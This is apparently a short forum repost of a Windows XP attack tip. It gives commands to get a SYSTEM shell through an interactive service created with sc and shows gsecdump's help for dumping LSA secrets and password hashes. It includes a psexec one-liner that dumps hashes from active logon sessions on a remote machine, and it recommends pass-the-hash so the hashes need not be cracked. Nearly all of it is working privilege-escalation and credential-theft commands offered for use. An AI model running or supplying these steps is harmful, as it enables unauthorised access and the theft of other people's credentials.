To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools package to load the hash information just grabbed with gsecdump into the local lsass process, which gives you a hash injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually don't need to be cracked at all; it is just a matter of using the tools. As the original article says, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I looked at the original source; it seems to be from 2007/03/16. Frustrating, what a gap.